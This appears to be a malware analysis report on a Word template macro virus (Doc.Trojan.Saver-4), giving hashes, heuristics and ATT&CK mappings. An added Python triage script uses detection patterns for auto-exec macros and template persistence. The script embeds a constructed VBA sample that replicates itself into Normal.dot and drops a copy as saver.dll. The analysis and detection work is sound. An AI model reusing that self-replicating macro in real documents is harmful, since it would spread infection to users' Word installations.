Malicious Office (OLE) / .DOT — malware analysis report

Static analysis result for SHA-256 097f2266f41c941f…

MALICIOUS

Office (OLE) / .DOT

Size: 44.0 KB
Created: 2007-08-28 08:21:00
Authoring application: Microsoft Office Word
MD5: 01f12b7bd2aaac4e5d0dc61c99f66dfd
SHA-1: d7e7605dffd9d487b6b432d456a931c384f7c62f
SHA-256: 097f2266f41c941f4b13cb18180c6064c4e1265d2d0d5f76f3e8a336ac9f0e9e
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Word template (.DOT) containing VBA macros. The 'Saver' macro is designed to copy itself into Normal.dot, the global template that Word loads at every start, and potentially into the Word application directory under the name 'saver.dll'. Infecting the global template is the classic self-replicating macro-virus persistence pattern: once Normal.dot carries the code, every document handled in that Word installation can be infected in turn. The AutoOpen and Auto_Close procedures give the code execution when the document is opened and again when it is closed, so no further user interaction is needed once macros are enabled. The ClamAV detection (Doc.Trojan.Saver-4), which fires on both the container and the extracted macro source, corroborates the verdict. Note that the template-based persistence described here is more precisely covered by ATT&CK T1137.001 (Office Application Startup: Office Template Macros) than by the Run-key technique listed above; the report records no registry activity.

Heuristics (5)

  • ClamAV: Doc.Trojan.Saver-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Saver-4
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project contains a procedure named AutoOpen, which Word runs automatically when the document is opened (once macros are enabled), with no further user interaction.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    The VBA project contains a procedure named Auto_Close, which Word runs automatically when the document is closed, giving the code a second execution opportunity.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: cae510adc9cf684a035d8119422e0cacf304ddef322b3d94f4413dd5078dcfe2
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2590 bytes
Detection: ClamAV: Doc.Trojan.Saver-4
Obfuscation or payload: unlikely
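The report's verdict rests on two observations about the decoded macro source: procedures with auto-execution names, and code that writes into Normal.dot or the Word program directory. The following is an added example, not code from the original report or from oletools, showing how to triage a decoded module dump such as the macros.bas artifact above for exactly that combination. olevba already flags AutoExec keywords and suspicious strings on its own; this script adds the correlation step (auto-exec entry point plus template persistence) that turns those keywords into the macro-virus verdict. Python is used because oletools itself is Python. The pattern labels are ours, and the VBA text at the bottom is constructed for illustration; it is not the macro recovered from the analysed sample.

```python
"""Triage a decoded VBA module for auto-execution entry points and
Office-template persistence.

Added example, not code from the original report or from oletools. It
expects the kind of text olevba writes when it decodes a module (such as
the macros.bas artifact) and reports which procedures Word runs
automatically and whether the code touches the global template or the
Word program directory. The VBA at the bottom is constructed for this
example and is not the macro recovered from the analysed sample.
"""
import re
import sys

# Procedure names Word/Excel run without a click once macros are enabled,
# plus the ThisDocument/ThisWorkbook event handlers.
AUTOEXEC_NAMES = {
    "autoopen", "autoexec", "autonew", "autoclose", "autoexit",
    "auto_open", "auto_close",
    "document_open", "document_close", "document_new",
    "workbook_open", "workbook_beforeclose",
}

# Start of a Sub/Function declaration; captures the procedure name.
PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+|Friend\s+)?(?:Static\s+)?"
    r"(?:Sub|Function)\s+([A-Za-z_]\w*)",
    re.IGNORECASE | re.MULTILINE,
)

# Indicators of the persistence pattern described in the report: writing
# into Normal.dot/Normal.dotm or the application directory, copying a
# module into another project, dropping a .dll. Labels are ours.
PERSISTENCE_PATTERNS = {
    "normal_template": re.compile(r"NormalTemplate|Normal\.dotm?\b", re.I),
    "app_or_startup_path": re.compile(
        r"Application\.(?:StartupPath|Path)\b|Options\.DefaultFilePath", re.I),
    "module_copy": re.compile(
        r"OrganizerCopy|VBComponents\.Import|CodeModule\.AddFromString", re.I),
    "file_write": re.compile(
        r"\b(?:FileCopy|SaveAs|Open\s+\S.*\s+For\s+(?:Output|Binary|Append))\b",
        re.I),
    "dll_drop": re.compile(r"\.dll\b", re.I),
}


def triage_vba(source):
    """Return entry points, persistence hits and a verdict for one module."""
    procedures = PROC_RE.findall(source)
    autoexec = sorted(
        {p for p in procedures if p.lower() in AUTOEXEC_NAMES}, key=str.lower)
    persistence = sorted(
        label for label, rx in PERSISTENCE_PATTERNS.items() if rx.search(source))
    # Auto-exec alone is suspicious; auto-exec plus a write into the
    # global template is the self-replicating macro-virus pattern.
    if autoexec and "normal_template" in persistence:
        verdict = "likely macro virus: auto-exec plus Normal.dot persistence"
    elif autoexec:
        verdict = "auto-exec macro present, review body manually"
    else:
        verdict = "no automatic entry point"
    return {
        "procedures": procedures,
        "autoexec": autoexec,
        "persistence": persistence,
        "verdict": verdict,
    }


# Constructed illustration of the behaviour the report describes; not the
# real macro source of the analysed sample.
SAMPLE_VBA = r"""Attribute VB_Name = "ThisDocument"

Sub AutoOpen()
    Saver
End Sub

Sub Auto_Close()
    Saver
End Sub

Private Function MacroInstalled() As Boolean
    MacroInstalled = NormalTemplate.VBProject.VBComponents.Count > 1
End Function

Private Sub Saver()
    If MacroInstalled Then Exit Sub
    ' Replicate into the global template so every Word session loads it
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="Saver", _
        Object:=wdOrganizerObjectProjectItems
    ' Second copy under an innocuous name in the program directory
    ActiveDocument.SaveAs FileName:=Application.Path & "\saver.dll"
End Sub
"""


def main(argv):
    """Triage a decoded module given as a file path, or the built-in sample."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_VBA
    result = triage_vba(source)
    print("procedures :", ", ".join(result["procedures"]) or "-")
    print("auto-exec  :", ", ".join(result["autoexec"]) or "-")
    print("persistence:", ", ".join(result["persistence"]) or "-")
    print("verdict    :", result["verdict"])
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to see the constructed sample triaged, or pass the path of an olevba dump (for example the output of `olevba --decode sample.dot` redirected to a file). The regex-based check is deliberately shallow: it does not follow string concatenation or Chr()-built names, so an obfuscated module (which the report rates as unlikely here) would need olevba's deobfuscation pass before this correlation is meaningful.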